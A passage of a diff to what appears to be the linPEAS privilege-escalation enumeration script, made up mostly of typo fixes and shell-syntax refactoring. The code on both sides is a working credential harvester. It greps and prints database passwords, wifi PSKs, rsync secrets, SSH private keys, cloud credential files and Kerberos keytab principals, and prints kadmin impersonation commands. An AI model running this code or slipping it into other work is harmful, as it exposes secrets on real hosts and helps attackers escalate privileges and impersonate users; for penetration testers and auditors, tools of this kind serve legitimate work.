[ "`echo \"$PSTORAGE_MOODLE\" | grep -E \"config\.php$\"`" ]; then echo_not_found "config.php"; fi; printf "%s" "$PSTORAGE_MOODLE" | grep -E "config\.php$" | while read f; do ls -ld "$f" | sed -${E} "s,config\.php$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "dbtype|dbhost|dbuser|dbhost|dbpass|dbport" | sed -${E} "s,dbtype|dbhost|dbuser|dbhost|dbpass|dbport,${SED_RED},g"; done; echo ""; - print_2title "Analizing Supervisord Files (limit 70)" + print_2title "Analyzing Supervisord Files (limit 70)" if ! [ "`echo \"$PSTORAGE_SUPERVISORD\" | grep -E \"supervisord\.conf$\"`" ]; then echo_not_found "supervisord.conf"; fi; printf "%s" "$PSTORAGE_SUPERVISORD" | grep -E "supervisord\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,supervisord\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "port.*=|username.*=|password.*=" | sed -${E} "s,port.*=|username.*=|password.*=,${SED_RED},g"; done; echo ""; - print_2title "Analizing Cesi Files (limit 70)" + print_2title "Analyzing Cesi Files (limit 70)" if ! [ "`echo \"$PSTORAGE_CESI\" | grep -E \"cesi\.conf$\"`" ]; then echo_not_found "cesi.conf"; fi; printf "%s" "$PSTORAGE_CESI" | grep -E "cesi\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,cesi\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "username.*=|password.*=|host.*=|port.*=|database.*=" | sed -${E} "s,username.*=|password.*=|host.*=|port.*=|database.*=,${SED_RED},g"; done; echo ""; - print_2title "Analizing Rsync Files (limit 70)" + print_2title "Analyzing Rsync Files (limit 70)" if ! [ "`echo \"$PSTORAGE_RSYNC\" | grep -E \"rsyncd\.conf$\"`" ]; then echo_not_found "rsyncd.conf"; fi; printf "%s" "$PSTORAGE_RSYNC" | grep -E "rsyncd\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,rsyncd\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#" | sed -${E} "s,secrets.*|auth.*users.*=,${SED_RED},g"; done; echo ""; if ! [ "`echo \"$PSTORAGE_RSYNC\" | grep -E \"rsyncd\.secrets$\"`" ]; then echo_not_found "rsyncd.secrets"; fi; printf "%s" "$PSTORAGE_RSYNC" | grep -E "rsyncd\.secrets$" | while read f; do ls -ld "$f" | sed -${E} "s,rsyncd\.secrets$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; - print_2title "Analizing Hostapd Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_HOSTAPD\" | grep -E \"hostapd\.conf$\"`" ]; then echo_not_found "hostapd.conf"; fi; printf "%s" "$PSTORAGE_HOSTAPD" | grep -E "hostapd\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,hostapd\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,passphrase.*,${SED_RED},g"; done; echo ""; + print_2title "Analyzing Hostapd Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_HOSTAPD\" | grep -E \"hostapd\.conf$\"`" ]; then echo_not_found "hostapd.conf"; fi; printf "%s" "$PSTORAGE_HOSTAPD" | grep -E "hostapd\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,hostapd\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,passphrase.*,${SED_RED},g"; done; echo ""; #-- SI) Wifi conns print_2title "Searching wifi conns file" - wifi=`find /etc/NetworkManager/system-connections/ -type f 2>/dev/null` + wifi=$(find /etc/NetworkManager/system-connections/ -type f 2>/dev/null) if [ "$wifi" ]; then printf "%s\n" "$wifi" | while read f; do echo "$f"; cat "$f" 2>/dev/null | grep "psk.*=" | sed "s,psk.*,${SED_RED},"; done else echo_not_found fi echo "" - print_2title "Analizing Anaconda-ks Files (limit 70)" + print_2title "Analyzing Anaconda ks Files (limit 70)" if ! [ "`echo \"$PSTORAGE_ANACONDA_KS\" | grep -E \"anaconda-ks\.cfg$\"`" ]; then echo_not_found "anaconda-ks.cfg"; fi; printf "%s" "$PSTORAGE_ANACONDA_KS" | grep -E "anaconda-ks\.cfg$" | while read f; do ls -ld "$f" | sed -${E} "s,anaconda-ks\.cfg$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "rootpw.*" | sed -${E} "s,rootpw.*,${SED_RED},g"; done; echo ""; - print_2title "Analizing VNC Files (limit 70)" + print_2title "Analyzing VNC Files (limit 70)" if ! [ "`echo \"$PSTORAGE_VNC\" | grep -E \"\.vnc$\"`" ]; then echo_not_found ".vnc"; fi; printf "%s" "$PSTORAGE_VNC" | grep -E "\.vnc$" | while read f; do ls -ld "$f" | sed -${E} "s,\.vnc$,${SED_RED},"; for ff in $(find "$f" -name "passwd"); do ls -ld "$ff" | sed -${E} "s,passwd,${SED_RED},"; done; echo "";done; echo ""; if ! [ "`echo \"$PSTORAGE_VNC\" | grep -E \"vnc.*\.c.*nf.*$\"`" ]; then echo_not_found "*vnc*.c*nf*"; fi; printf "%s" "$PSTORAGE_VNC" | grep -E "vnc.*\.c.*nf.*$" | while read f; do ls -ld "$f" | sed -${E} "s,vnc.*\.c.*nf.*$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; if ! [ "`echo \"$PSTORAGE_VNC\" | grep -E \"vnc.*\.ini$\"`" ]; then echo_not_found "*vnc*.ini"; fi; printf "%s" "$PSTORAGE_VNC" | grep -E "vnc.*\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,vnc.*\.ini$,${SED_RED},"; done; echo ""; @@ -2138,40 +2476,40 @@ if [ "`echo $CHECKS | grep SofI`" ]; then if ! [ "`echo \"$PSTORAGE_VNC\" | grep -E \"vnc.*\.xml$\"`" ]; then echo_not_found "*vnc*.xml"; fi; printf "%s" "$PSTORAGE_VNC" | grep -E "vnc.*\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,vnc.*\.xml$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; - print_2title "Analizing Ldap Files (limit 70)" + print_2title "Analyzing Ldap Files (limit 70)" echo "The password hash is from the {SSHA} to 'structural'" if ! [ "`echo \"$PSTORAGE_LDAP\" | grep -E \"ldap$\"`" ]; then echo_not_found "ldap"; fi; printf "%s" "$PSTORAGE_LDAP" | grep -E "ldap$" | while read f; do ls -ld "$f" | sed -${E} "s,ldap$,${SED_RED},"; for ff in $(find "$f" -name "*.bdb"); do ls -ld "$ff" | sed -${E} "s,.bdb,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E -i -a -o "description.*" | sort | uniq | sed -${E} "s,administrator|password|ADMINISTRATOR|PASSWORD|Password|Administrator,${SED_RED},g"; done; echo "";done; echo ""; - print_2title "Analizing Open VPN Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_OPEN_VPN\" | grep -E \"\.ovpn$\"`" ]; then echo_not_found "*.ovpn"; fi; printf "%s" "$PSTORAGE_OPEN_VPN" | grep -E "\.ovpn$" | while read f; do ls -ld "$f" | sed -${E} "s,\.ovpn$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "auth-user-pass.+" | sed -${E} "s,auth-user-pass.+,${SED_RED},g"; done; echo ""; + print_2title "Analyzing OpenVPN Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_OPENVPN\" | grep -E \"\.ovpn$\"`" ]; then echo_not_found "*.ovpn"; fi; printf "%s" "$PSTORAGE_OPENVPN" | grep -E "\.ovpn$" | while read f; do ls -ld "$f" | sed -${E} "s,\.ovpn$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "auth-user-pass.+" | sed -${E} "s,auth-user-pass.+,${SED_RED},g"; done; echo ""; #-- SI) ssh files print_2title "Searching ssl/ssh files" - if [ "$PSTORAGE_CERTSB4" ]; then certsb4_grep=`grep -L "\"\|'\|(" $PSTORAGE_CERTSB4 2>/dev/null`; fi - sshconfig="`ls /etc/ssh/ssh_config 2>/dev/null`" - hostsdenied="`ls /etc/hosts.denied 2>/dev/null`" - hostsallow="`ls /etc/hosts.allow 2>/dev/null`" + if [ "$PSTORAGE_CERTSB4" ]; then certsb4_grep=$(grep -L "\"\|'\|(" $PSTORAGE_CERTSB4 2>/dev/null); fi + sshconfig="$(ls /etc/ssh/ssh_config 2>/dev/null)" + hostsdenied="$(ls /etc/hosts.denied 2>/dev/null)" + hostsallow="$(ls /etc/hosts.allow 2>/dev/null)" - print_2title "Analizing SSH FILES Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_SSH_FILES\" | grep -E \"id_dsa.*$\"`" ]; then echo_not_found "id_dsa*"; fi; printf "%s" "$PSTORAGE_SSH_FILES" | grep -E "id_dsa.*$" | while read f; do ls -ld "$f" | sed -${E} "s,id_dsa.*$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_SSH_FILES\" | grep -E \"id_rsa.*$\"`" ]; then echo_not_found "id_rsa*"; fi; printf "%s" "$PSTORAGE_SSH_FILES" | grep -E "id_rsa.*$" | while read f; do ls -ld "$f" | sed -${E} "s,id_rsa.*$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_SSH_FILES\" | grep -E \"known_hosts$\"`" ]; then echo_not_found "known_hosts"; fi; printf "%s" "$PSTORAGE_SSH_FILES" | grep -E "known_hosts$" | while read f; do ls -ld "$f" | sed -${E} "s,known_hosts$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_SSH_FILES\" | grep -E \"authorized_hosts$\"`" ]; then echo_not_found "authorized_hosts"; fi; printf "%s" "$PSTORAGE_SSH_FILES" | grep -E "authorized_hosts$" | while read f; do ls -ld "$f" | sed -${E} "s,authorized_hosts$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_SSH_FILES\" | grep -E \"authorized_keys$\"`" ]; then echo_not_found "authorized_keys"; fi; printf "%s" "$PSTORAGE_SSH_FILES" | grep -E "authorized_keys$" | while read f; do ls -ld "$f" | sed -${E} "s,authorized_keys$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,from=[\w\._\-]+,${SED_GOOD},g"; done; echo ""; + print_2title "Analyzing SSH Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_SSH\" | grep -E \"id_dsa.*$\"`" ]; then echo_not_found "id_dsa*"; fi; printf "%s" "$PSTORAGE_SSH" | grep -E "id_dsa.*$" | while read f; do ls -ld "$f" | sed -${E} "s,id_dsa.*$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_SSH\" | grep -E \"id_rsa.*$\"`" ]; then echo_not_found "id_rsa*"; fi; printf "%s" "$PSTORAGE_SSH" | grep -E "id_rsa.*$" | while read f; do ls -ld "$f" | sed -${E} "s,id_rsa.*$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_SSH\" | grep -E \"known_hosts$\"`" ]; then echo_not_found "known_hosts"; fi; printf "%s" "$PSTORAGE_SSH" | grep -E "known_hosts$" | while read f; do ls -ld "$f" | sed -${E} "s,known_hosts$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_SSH\" | grep -E \"authorized_hosts$\"`" ]; then echo_not_found "authorized_hosts"; fi; printf "%s" "$PSTORAGE_SSH" | grep -E "authorized_hosts$" | while read f; do ls -ld "$f" | sed -${E} "s,authorized_hosts$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_SSH\" | grep -E \"authorized_keys$\"`" ]; then echo_not_found "authorized_keys"; fi; printf "%s" "$PSTORAGE_SSH" | grep -E "authorized_keys$" | while read f; do ls -ld "$f" | sed -${E} "s,authorized_keys$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,from=[\w\._\-]+,${SED_GOOD},g"; done; echo ""; grep "PermitRootLogin \|ChallengeResponseAuthentication \|PasswordAuthentication \|UsePAM \|Port\|PermitEmptyPasswords\|PubkeyAuthentication\|ListenAddress\|ForwardAgent\|AllowAgentForwarding\|AuthorizedKeysFiles" /etc/ssh/sshd_config 2>/dev/null | grep -v "#" | sed -${E} "s,PermitRootLogin.*es|PermitEmptyPasswords.*es|ChallengeResponseAuthentication.*es|FordwardAgent.*es,${SED_RED}," if [ "$TIMEOUT" ]; then - privatekeyfilesetc=`timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /etc 2>/dev/null` - privatekeyfileshome=`timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' $HOMESEARCH 2>/dev/null` - privatekeyfilesroot=`timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /root 2>/dev/null` - privatekeyfilesmnt=`timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /mnt 2>/dev/null` + privatekeyfilesetc=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /etc 2>/dev/null) + privatekeyfileshome=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' $HOMESEARCH 2>/dev/null) + privatekeyfilesroot=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /root 2>/dev/null) + privatekeyfilesmnt=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /mnt 2>/dev/null) else - privatekeyfilesetc=`grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /etc 2>/dev/null` #If there is tons of files linpeas gets frozen here without a timeout - privatekeyfileshome=`grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' $HOME/.ssh 2>/dev/null` + privatekeyfilesetc=$(grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /etc 2>/dev/null) #If there is tons of files linpeas gets frozen here without a timeout + privatekeyfileshome=$(grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' $HOME/.ssh 2>/dev/null) fi if [ "$privatekeyfilesetc" ] || [ "$privatekeyfileshome" ] || [ "$privatekeyfilesroot" ] || [ "$privatekeyfilesmnt" ] ; then @@ -2183,7 +2521,7 @@ if [ "`echo $CHECKS | grep SofI`" ]; then if [ "$privatekeyfilesmnt" ]; then printf "$privatekeyfilesmnt\n" | sed -${E} "s,.*,${SED_RED},"; fi echo "" fi - if [ "$certsb4_grep" ] || [ "$$PSTORAGE_CERTSBIN" ]; then + if [ "$certsb4_grep" ] || [ "$PSTORAGE_CERTSBIN" ]; then print_3title "Some certificates were found (out limited):" printf "$certsb4_grep\n" | head -n 20 printf "$$PSTORAGE_CERTSBIN\n" | head -n 20 @@ -2199,7 +2537,7 @@ if [ "`echo $CHECKS | grep SofI`" ]; then printf "$PSTORAGE_SSH_AGENTS\n" echo "" fi - if [ "`ssh-add -l 2>/dev/null | grep -v 'no identities'`" ]; then + if ssh-add -l 2>/dev/null | grep -qv 'no identities'; then print_3title "Listing SSH Agents" ssh-add -l echo "" @@ -2224,15 +2562,15 @@ if [ "`echo $CHECKS | grep SofI`" ]; then if [ "$sshconfig" ]; then echo "" echo "Searching inside /etc/ssh/ssh_config for interesting info" - cat /etc/ssh/ssh_config 2>/dev/null | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null | grep -Iv "^$" | sed -${E} "s,Host|ForwardAgent|User|ProxyCommand,${SED_RED}," + grep -v "^#" /etc/ssh/ssh_config 2>/dev/null | grep -Ev "\W+\#|^#" 2>/dev/null | grep -Iv "^$" | sed -${E} "s,Host|ForwardAgent|User|ProxyCommand,${SED_RED}," fi echo "" #-- SI) PAM auth print_2title "Searching unexpected auth lines in /etc/pam.d/sshd" - pamssh=`cat /etc/pam.d/sshd 2>/dev/null | grep -v "^#\|^@" | grep -i auth` + pamssh=$(grep -v "^#\|^@" /etc/pam.d/sshd 2>/dev/null | grep -i auth) if [ "$pamssh" ]; then - cat /etc/pam.d/sshd 2>/dev/null | grep -v "^#\|^@" | grep -i auth | sed -${E} "s,.*,${SED_RED}," + grep -v "^#\|^@" /etc/pam.d/sshd 2>/dev/null | grep -i auth | sed -${E} "s,.*,${SED_RED}," else echo_no fi echo "" @@ -2240,7 +2578,7 @@ if [ "`echo $CHECKS | grep SofI`" ]; then #-- SI) NFS exports print_2title "NFS exports?" print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/nfs-no_root_squash-misconfiguration-pe" - if [ "`cat /etc/exports 2>/dev/null`" ]; then cat /etc/exports 2>/dev/null | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null | sed -${E} "s,no_root_squash|no_all_squash ,${SED_RED_YELLOW}," | sed -${E} "s,insecure,${SED_RED}," + if [ "$(cat /etc/exports 2>/dev/null)" ]; then grep -v "^#" /etc/exports 2>/dev/null | grep -Ev "\W+\#|^#" 2>/dev/null | sed -${E} "s,no_root_squash|no_all_squash ,${SED_RED_YELLOW}," | sed -${E} "s,insecure,${SED_RED}," else echo_not_found "/etc/exports" fi echo "" @@ -2248,31 +2586,31 @@ if [ "`echo $CHECKS | grep SofI`" ]; then #-- SI) Kerberos print_2title "Searching kerberos conf files and tickets" print_info "https://book.hacktricks.xyz/pentesting/pentesting-kerberos-88#pass-the-ticket-ptt" - kadmin_exists="`command -v kadmin`" - klist_exists="`command -v klist`" + kadmin_exists="$(command -v kadmin)" + klist_exists="$(command -v klist)" if [ "$kadmin_exists" ]; then echo "kadmin was found on $kadmin_exists" | sed "s,$kadmin_exists,${SED_RED},"; fi if [ "$klist_exists" ] && [ -x "$klist_exists" ]; then echo "klist execution"; klist; fi printf "%s\n" "$PSTORAGE_KERBEROS" | while read f; do if [ -r "$f" ]; then - if [ "`echo \"$f\" | grep .k5login`" ]; then + if echo "$f" | grep -q .k5login; then echo ".k5login file (users with access to the user who has this file in his home)" cat "$f" 2>/dev/null | sed -${E} "s,.*,${SED_RED},g" - elif [ "`echo \"$f\" | grep keytab`" ]; then + elif echo "$f" | grep -q keytab; then echo "" echo "keytab file found, you may be able to impersonate some kerberos principals and add users or modify passwords" klist -k "$f" 2>/dev/null | sed -${E} "s,.*,${SED_RED},g" - printf "`klist -k \"$f\" 2>/dev/null`\n" | awk '{print $2}' | while read l; do - if [ "$l" ] && [ "`echo \"$l\" | grep \"@\"`" ]; then + printf "$(klist -k $f 2>/dev/null)\n" | awk '{print $2}' | while read l; do + if [ "$l" ] && echo "$l" | grep -q "@"; then printf "$ITALIC --- Impersonation command: ${NC}kadmin -k -t /etc/krb5.keytab -p \"$l\"\n" | sed -${E} "s,$l,${SED_RED},g" #kadmin -k -t /etc/krb5.keytab -p "$l" -q getprivs 2>/dev/null #This should show the permissions of each impersoanted user, the thing is that in a test it showed that every user had the same permissions (even if they didn't). So this test isn't valid #We could also try to create a new user or modify a password, but I'm not user if linpeas should do that fi done - elif [ "`echo \"$f\" | grep krb5.conf`" ]; then + elif echo "$f" | grep -q krb5.conf; then ls -l "$f" cat "$f" 2>/dev/null | grep default_ccache_name | sed -${E} "s,default_ccache_name,${SED_RED},"; - elif [ "`echo \"$f\" | grep kadm5.acl`" ]; then + elif echo "$f" | grep -q kadm5.acl; then ls -l "$f" cat "$f" 2>/dev/null fi @@ -2282,15 +2620,15 @@ if [ "`echo $CHECKS | grep SofI`" ]; then klist 2>/dev/null || echo_not_found "klist" echo "" - print_2title "Analizing Knockd Files (limit 70)" + print_2title "Analyzing Knockd Files (limit 70)" if ! [ "`echo \"$PSTORAGE_KNOCKD\" | grep -E \"knockd.*$\"`" ]; then echo_not_found "*knockd*"; fi; printf "%s" "$PSTORAGE_KNOCKD" | grep -E "knockd.*$" | while read f; do ls -ld "$f" | sed -${E} "s,knockd.*$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; - print_2title "Analizing Kibana Files (limit 70)" + print_2title "Analyzing Kibana Files (limit 70)" if ! [ "`echo \"$PSTORAGE_KIBANA\" | grep -E \"kibana\.y.*ml$\"`" ]; then echo_not_found "kibana.y*ml"; fi; printf "%s" "$PSTORAGE_KIBANA" | grep -E "kibana\.y.*ml$" | while read f; do ls -ld "$f" | sed -${E} "s,kibana\.y.*ml$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#|^[[:space:]]*$" | sed -${E} "s,username|password|host|port|elasticsearch|ssl,${SED_RED},g"; done; echo ""; - print_2title "Analizing Elasticsearch Files (limit 70)" + print_2title "Analyzing Elasticsearch Files (limit 70)" echo "The version is $(curl -X GET '127.0.0.1:9200' 2>/dev/null | grep number | cut -d ':' -f 2)" if ! [ "`echo \"$PSTORAGE_ELASTICSEARCH\" | grep -E \"elasticsearch\.y.*ml$\"`" ]; then echo_not_found "elasticsearch.y*ml"; fi; printf "%s" "$PSTORAGE_ELASTICSEARCH" | grep -E "elasticsearch\.y.*ml$" | while read f; do ls -ld "$f" | sed -${E} "s,elasticsearch\.y.*ml$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "path.data|path.logs|cluster.name|node.name|network.host|discovery.zen.ping.unicast.hosts" | grep -Ev "\W+\#|^#"; done; echo ""; @@ -2302,7 +2640,7 @@ if [ "`echo $CHECKS | grep SofI`" ]; then printf "%s\n" "$PSTORAGE_LOGSTASH" | while read d; do if [ -r "$d/startup.options" ]; then echo "Logstash is running as user:" - cat "$d/startup.options" 2>/dev/null | grep "LS_USER\|LS_GROUP" | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed -${E} "s,$USER,${C}[1;95m&${C}[0m," | sed -${E} "s,root,${SED_RED}," + cat "$d/startup.options" 2>/dev/null | grep "LS_USER\|LS_GROUP" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed -${E} "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,root,${SED_RED}," fi cat "$d/conf.d/out*" | grep "exec\s*{\|command\s*=>" | sed -${E} "s,exec\W*\{|command\W*=>,${SED_RED}," cat "$d/conf.d/filt*" | grep "path\s*=>\|code\s*=>\|ruby\s*{" | sed -${E} "s,path\W*=>|code\W*=>|ruby\W*\{,${SED_RED}," @@ -2324,7 +2662,7 @@ if [ "`echo $CHECKS | grep SofI`" ]; then echo "" #-- SI) Cached AD Hashes - adhashes=`ls "/var/lib/samba/private/secrets.tdb" "/var/lib/samba/passdb.tdb" "/var/opt/quest/vas/authcache/vas_auth.vdb" "/var/lib/sss/db/cache_*" 2>/dev/null` + adhashes=$(ls "/var/lib/samba/private/secrets.tdb" "/var/lib/samba/passdb.tdb" "/var/opt/quest/vas/authcache/vas_auth.vdb" "/var/lib/sss/db/cache_*" 2>/dev/null) print_2title "Searching AD cached hashes" if [ "$adhashes" ]; then ls -l "/var/lib/samba/private/secrets.tdb" "/var/lib/samba/passdb.tdb" "/var/opt/quest/vas/authcache/vas_auth.vdb" "/var/lib/sss/db/cache_*" 2>/dev/null @@ -2335,7 +2673,7 @@ if [ "`echo $CHECKS | grep SofI`" ]; then #-- SI) Screen sessions print_2title "Searching screen sessions" print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-shell-sessions" - screensess=`screen -ls 2>/dev/null` + screensess=$(screen -ls 2>/dev/null) if [ "$screensess" ]; then printf "$screensess" | sed -${E} "s,.*,${SED_RED}," | sed -${E} "s,No Sockets found.*,${C}[32m&${C}[0m," else echo_not_found "screen" @@ -2343,8 +2681,8 @@ if [ "`echo $CHECKS | grep SofI`" ]; then echo "" #-- SI) Tmux sessions - tmuxdefsess=`tmux ls 2>/dev/null` - tmuxnondefsess=`ps auxwww | grep "tmux " | grep -v grep` + tmuxdefsess=$(tmux ls 2>/dev/null) + tmuxnondefsess=$(ps auxwww | grep "tmux " | grep -v grep) print_2title "Searching tmux sessions"$N print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-shell-sessions" if [ "$tmuxdefsess" ] || [ "$tmuxnondefsess" ]; then @@ -2353,11 +2691,11 @@ if [ "`echo $CHECKS | grep SofI`" ]; then fi echo "" - print_2title "Analizing CouchDB Files (limit 70)" + print_2title "Analyzing CouchDB Files (limit 70)" if ! [ "`echo \"$PSTORAGE_COUCHDB\" | grep -E \"couchdb$\"`" ]; then echo_not_found "couchdb"; fi; printf "%s" "$PSTORAGE_COUCHDB" | grep -E "couchdb$" | while read f; do ls -ld "$f" | sed -${E} "s,couchdb$,${SED_RED},"; for ff in $(find "$f" -name "local.ini"); do ls -ld "$ff" | sed -${E} "s,local.ini,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -Ev "^;" | sed -${E} "s,admin.*|password.*|cert_file.*|key_file.*|hashed.*|pbkdf2.*,${SED_RED},g"; done; echo "";done; echo ""; - print_2title "Analizing Redis Files (limit 70)" + print_2title "Analyzing Redis Files (limit 70)" if ! [ "`echo \"$PSTORAGE_REDIS\" | grep -E \"redis\.conf$\"`" ]; then echo_not_found "redis.conf"; fi; printf "%s" "$PSTORAGE_REDIS" | grep -E "redis\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,redis\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#" | sed -${E} "s,masterauth.*|requirepass.*,${SED_RED},g"; done; echo ""; @@ -2377,15 +2715,15 @@ if [ "`echo $CHECKS | grep SofI`" ]; then fi echo "" - print_2title "Analizing Mosquitto Files (limit 70)" + print_2title "Analyzing Mosquitto Files (limit 70)" if ! [ "`echo \"$PSTORAGE_MOSQUITTO\" | grep -E \"mosquitto\.conf$\"`" ]; then echo_not_found "mosquitto.conf"; fi; printf "%s" "$PSTORAGE_MOSQUITTO" | grep -E "mosquitto\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,mosquitto\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#" | sed -${E} "s,password_file.*|psk_file.*|allow_anonymous.*true|auth,${SED_RED},g"; done; echo ""; - print_2title "Analizing Neo4j Files (limit 70)" + print_2title "Analyzing Neo4j Files (limit 70)" if ! [ "`echo \"$PSTORAGE_NEO4J\" | grep -E \"neo4j$\"`" ]; then echo_not_found "neo4j"; fi; printf "%s" "$PSTORAGE_NEO4J" | grep -E "neo4j$" | while read f; do ls -ld "$f" | sed -${E} "s,neo4j$,${SED_RED},"; for ff in $(find "$f" -name "auth"); do ls -ld "$ff" | sed -${E} "s,auth,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";done; echo ""; - print_2title "Analizing Cloud credentials Files (limit 70)" + print_2title "Analyzing Cloud Credentials Files (limit 70)" if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"credentials$\"`" ]; then echo_not_found "credentials"; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "credentials$" | while read f; do ls -ld "$f" | sed -${E} "s,credentials$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"credentials\.db$\"`" ]; then echo_not_found "credentials.db"; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "credentials\.db$" | while read f; do ls -ld "$f" | sed -${E} "s,credentials\.db$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"legacy_credentials\.db$\"`" ]; then echo_not_found "legacy_credentials.db"; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "legacy_credentials\.db$" | while read f; do ls -ld "$f" | sed -${E} "s,legacy_credentials\.db$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; @@ -2398,51 +2736,52 @@ if [ "`echo $CHECKS | grep SofI`" ]; then if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"\.bluemix$\"`" ]; then echo_not_found ".bluemix"; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "\.bluemix$" | while read f; do ls -ld "$f" | sed -${E} "s,\.bluemix$,${SED_RED},"; for ff in $(find "$f" -name "config.json"); do ls -ld "$ff" | sed -${E} "s,config.json,${SED_RED},"; 